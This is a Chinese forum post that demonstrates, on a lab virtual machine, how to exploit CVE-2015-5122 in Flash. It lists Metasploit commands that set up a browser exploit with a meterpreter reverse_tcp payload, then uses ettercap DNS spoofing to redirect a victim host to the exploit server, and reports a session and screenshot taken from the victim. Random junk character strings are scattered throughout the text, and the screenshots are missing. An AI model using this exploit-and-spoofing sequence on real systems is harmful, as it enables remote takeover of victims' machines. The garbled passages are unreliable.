cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

9 G$ n3 r' q$ U- R3 {" Q 二、cve2015-5122漏洞实例演示虚拟机 ( I: z3 `: n- M" }. l3 S) g3 R

( g6 B4 X1 X/ O* z; A, y, i 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： ) K) u; S1 I/ }/ |

! y) v0 m; U& Q r. A& F* X search cve-2015-5122如图： 3 b; Z' p5 {$ p b

$ o1 i7 A3 c; y. w$ M( P2 k5 _ : K) ^* [6 D8 B

3 L' i& |: Z! w3 N/ w, f5 I9 G 下面我们敲如下命令： 4 n6 R% y) E8 p' a1 [2 h% x

* Z1 C* } {! \: x- E; x6 S( R use exploit/multi/browser/adobe_flash_opaque_background_uaf 2 u; @4 ?, i5 a* J4 U

' I* _$ u: f6 n1 K set PAYLOAD windows/meterpreter/reverse_tcp 3 X& `+ B: n% j) P

- g+ L# i o/ K; E7 {" R set LHOST 192.168.0.109 9 ]$ _# [8 [8 p; w8 i& f8 ~/ t

5 E) [$ K& `- o- H& M; k. z set URIPATH / /*根目录*/ 7 P6 ?! {$ {4 Z. D+ S1 r2 `2 c( \

. L# z z+ W( z! y/ \0 l; B# F set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 5 k9 x" S7 G8 v

& |# i; `' P1 H set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 6 i9 u S9 _( W! b8 B6 d. K2 ]2 D

% X+ l/ n8 \1 @+ D! u) Z 然后show options如图： 8 m; y4 R* s5 ]% u

" E* q- s! ~5 Q* l( L - P# i6 s: l/ q3 P8 U+ H

. N: \6 c; T5 G+ E 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
$ v" ?3 d: `) S3 V$ @ ' ?8 I$ z4 u ]% l O9 A4 E* p) K

# Z& l% ?5 r4 B2 y5 Z& h \; H 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 2 K5 U8 Y+ S) r/ [; ?: z

6 b6 k0 [5 s+ b4 A' X Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf " B( B; |. Q/ w8 M

3 k3 V: _. Y8 K 1 Q9 L- l) U& i2 V1 S

. X7 A! ]! F9 v0 \4 P. W$ T 成功了，这时候我们断开ettercap，如图： * z# L2 {3 e6 L$ @, R* X

$ B" J5 ?" Z# o+ Q & q& E6 Z/ {* f( Y

) E) V9 k* a' n6 I6 _3 g Screenshot如图： 3 ~5 F: x8 ?/ W$ K j6 |# p# @

% h- V$ M* Z2 t' i( W2 P$ z4 z7 |$ E ( m) ?$ [: P- f2 e9 G

* f$ T, Q' d8 G2 [ 2 B$ @4 F' K( Z! A

		自动登录	找回密码
密码			立即注册